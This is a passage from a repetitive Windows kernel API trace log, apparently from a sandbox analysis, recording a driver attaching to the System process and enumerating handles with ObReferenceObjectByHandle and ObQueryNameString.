Object=0xffffe0006a778600, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.980] ObfDereferenceObject (Object=0xffffe0006a778600) returned 0x8000 [0258.980] IoCompleteRequest () returned 0x0 [0258.980] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.980] PsAcquireProcessExitSynchronization () returned 0x0 [0258.980] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.980] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ef0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a3707d0, HandleInformation=0x0) returned 0x0 [0258.980] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.980] PsReleaseProcessExitSynchronization () returned 0x2 [0258.980] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a0 [0258.980] ObQueryNameString (in: Object=0xffffe0006a3707d0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.980] ObfDereferenceObject (Object=0xffffe0006a3707d0) returned 0x8000 [0258.980] IoCompleteRequest () returned 0x0 [0258.980] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.980] PsAcquireProcessExitSynchronization () returned 0x0 [0258.980] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.980] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ef8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.980] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.980] PsReleaseProcessExitSynchronization () returned 0x2 [0258.980] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f99f [0258.980] IoCompleteRequest () returned 0x0 [0258.980] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.980] PsAcquireProcessExitSynchronization () returned 0x0 [0258.981] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f00, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a8ef280, HandleInformation=0x0) returned 0x0 [0258.981] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.981] PsReleaseProcessExitSynchronization () returned 0x2 [0258.981] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f99e [0258.981] ObQueryNameString (in: Object=0xffffe0006a8ef280, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.981] ObfDereferenceObject (Object=0xffffe0006a8ef280) returned 0x8000 [0258.981] IoCompleteRequest () returned 0x0 [0258.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.981] PsAcquireProcessExitSynchronization () returned 0x0 [0258.981] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f0c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.981] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.981] PsReleaseProcessExitSynchronization () returned 0x2 [0258.981] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f99d [0258.981] IoCompleteRequest () returned 0x0 [0258.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.981] PsAcquireProcessExitSynchronization () returned 0x0 [0258.981] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.981] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.981] PsReleaseProcessExitSynchronization () returned 0x2 [0258.981] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f99c [0258.981] IoCompleteRequest () returned 0x0 [0258.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.981] PsAcquireProcessExitSynchronization () returned 0x0 [0258.981] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.981] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.981] PsReleaseProcessExitSynchronization () returned 0x2 [0258.981] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f99b [0258.981] IoCompleteRequest () returned 0x0 [0258.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.981] PsAcquireProcessExitSynchronization () returned 0x0 [0258.981] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.981] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.981] PsReleaseProcessExitSynchronization () returned 0x2 [0258.981] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f99a [0258.981] IoCompleteRequest () returned 0x0 [0258.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.981] PsAcquireProcessExitSynchronization () returned 0x0 [0258.981] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.981] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.981] PsReleaseProcessExitSynchronization () returned 0x2 [0258.981] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f999 [0258.982] IoCompleteRequest () returned 0x0 [0258.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.982] PsAcquireProcessExitSynchronization () returned 0x0 [0258.982] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.982] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a67f3e0, HandleInformation=0x0) returned 0x0 [0258.982] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.982] PsReleaseProcessExitSynchronization () returned 0x2 [0258.982] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f998 [0258.982] ObQueryNameString (in: Object=0xffffe0006a67f3e0, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.982] ObfDereferenceObject (Object=0xffffe0006a67f3e0) returned 0x8000 [0258.982] IoCompleteRequest () returned 0x0 [0258.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.982] PsAcquireProcessExitSynchronization () returned 0x0 [0258.982] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.982] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.982] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.982] PsReleaseProcessExitSynchronization () returned 0x2 [0258.982] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f997 [0258.982] IoCompleteRequest () returned 0x0 [0258.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.982] PsAcquireProcessExitSynchronization () returned 0x0 [0258.982] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.982] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.982] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.982] PsReleaseProcessExitSynchronization () returned 0x2 [0258.982] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f996 [0258.982] IoCompleteRequest () returned 0x0 [0258.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.982] PsAcquireProcessExitSynchronization () returned 0x0 [0258.982] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.982] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.982] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.982] PsReleaseProcessExitSynchronization () returned 0x2 [0258.982] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f995 [0258.982] IoCompleteRequest () returned 0x0 [0258.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.982] PsAcquireProcessExitSynchronization () returned 0x0 [0258.982] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.982] ObReferenceObjectByHandle (in: Handle=0xffffffff80000f8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.982] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.982] PsReleaseProcessExitSynchronization () returned 0x2 [0258.982] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f994 [0258.982] IoCompleteRequest () returned 0x0 [0258.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.982] PsAcquireProcessExitSynchronization () returned 0x0 [0258.982] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.983] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.983] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.983] PsReleaseProcessExitSynchronization () returned 0x2 [0258.983] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f993 [0258.983] IoCompleteRequest () returned 0x0 [0258.983] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.983] PsAcquireProcessExitSynchronization () returned 0x0 [0258.983] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.983] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.983] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.983] PsReleaseProcessExitSynchronization () returned 0x2 [0258.983] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f992 [0258.983] IoCompleteRequest () returned 0x0 [0258.983] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.983] PsAcquireProcessExitSynchronization () returned 0x0 [0258.983] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.983] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.983] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.983] PsReleaseProcessExitSynchronization () returned 0x2 [0258.983] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f991 [0258.983] IoCompleteRequest () returned 0x0 [0258.983] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.983] PsAcquireProcessExitSynchronization () returned 0x0 [0258.983] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.983] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.983] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.983] PsReleaseProcessExitSynchronization () returned 0x2 [0258.983] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f990 [0258.983] IoCompleteRequest () returned 0x0 [0258.983] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.983] PsAcquireProcessExitSynchronization () returned 0x0 [0258.983] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.983] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.983] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.983] PsReleaseProcessExitSynchronization () returned 0x2 [0258.983] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f98f [0258.983] IoCompleteRequest () returned 0x0 [0258.983] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.983] PsAcquireProcessExitSynchronization () returned 0x0 [0258.983] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.983] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.983] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.983] PsReleaseProcessExitSynchronization () returned 0x2 [0258.983] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f98e [0258.983] IoCompleteRequest () returned 0x0 [0258.984] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.984] PsAcquireProcessExitSynchronization () returned 0x0 [0258.984] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.984] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.984] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.984] PsReleaseProcessExitSynchronization () returned 0x2 [0258.984] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f98d [0258.984] IoCompleteRequest () returned 0x0 [0258.984] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.984] PsAcquireProcessExitSynchronization () returned 0x0 [0258.984] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.984] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.984] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.984] PsReleaseProcessExitSynchronization () returned 0x2 [0258.984] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f98c [0258.984] IoCompleteRequest () returned 0x0 [0258.984] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.984] PsAcquireProcessExitSynchronization () returned 0x0 [0258.984] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.984] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fe0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.984] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.984] PsReleaseProcessExitSynchronization () returned 0x2 [0258.984] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f98b [0258.984] IoCompleteRequest () returned 0x0 [0258.984] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.984] PsAcquireProcessExitSynchronization () returned 0x0 [0258.984] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.984] ObReferenceObjectByHandle (in: Handle=0xffffffff80000fe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.984] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.984] PsReleaseProcessExitSynchronization () returned 0x2 [0258.984] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f98a [0258.984] IoCompleteRequest () returned 0x0 [0258.984] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.984] PsAcquireProcessExitSynchronization () returned 0x0 [0258.984] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.984] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ff0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a644270, HandleInformation=0x0) returned 0x0 [0258.984] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.984] PsReleaseProcessExitSynchronization () returned 0x2 [0258.984] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f989 [0258.984] ObQueryNameString (in: Object=0xffffe0006a644270, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.984] ObfDereferenceObject (Object=0xffffe0006a644270) returned 0x8000 [0258.984] IoCompleteRequest () returned 0x0 [0258.984] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.984] PsAcquireProcessExitSynchronization () returned 0x0 [0258.984] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.985] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ff8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.985] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.985] PsReleaseProcessExitSynchronization () returned 0x2 [0258.985] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f988 [0258.985] IoCompleteRequest () returned 0x0 [0258.985] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.985] PsAcquireProcessExitSynchronization () returned 0x0 [0258.985] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.985] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ffc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.985] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.985] PsReleaseProcessExitSynchronization () returned 0x2 [0258.985] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f987 [0258.985] IoCompleteRequest () returned 0x0 [0258.985] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.985] PsAcquireProcessExitSynchronization () returned 0x0 [0258.985] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.985] ObReferenceObjectByHandle (in: Handle=0xffffffff80001004, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.985] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.985] PsReleaseProcessExitSynchronization () returned 0x2 [0258.985] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f986 [0258.985] IoCompleteRequest () returned 0x0 [0258.985] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.985] PsAcquireProcessExitSynchronization () returned 0x0 [0258.985] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.985] ObReferenceObjectByHandle (in: Handle=0xffffffff8000100c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.985] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.985] PsReleaseProcessExitSynchronization () returned 0x2 [0258.985] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f985 [0258.985] IoCompleteRequest () returned 0x0 [0258.985] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.985] PsAcquireProcessExitSynchronization () returned 0x0 [0258.985] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.985] ObReferenceObjectByHandle (in: Handle=0xffffffff80001018, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.985] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.985] PsReleaseProcessExitSynchronization () returned 0x2 [0258.985] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f984 [0258.985] IoCompleteRequest () returned 0x0 [0258.985] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.985] PsAcquireProcessExitSynchronization () returned 0x0 [0258.985] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.985] ObReferenceObjectByHandle (in: Handle=0xffffffff8000101c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.985] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.985] PsReleaseProcessExitSynchronization () returned 0x2 [0258.985] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f983 [0258.985] IoCompleteRequest () returned 0x0 [0258.985] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 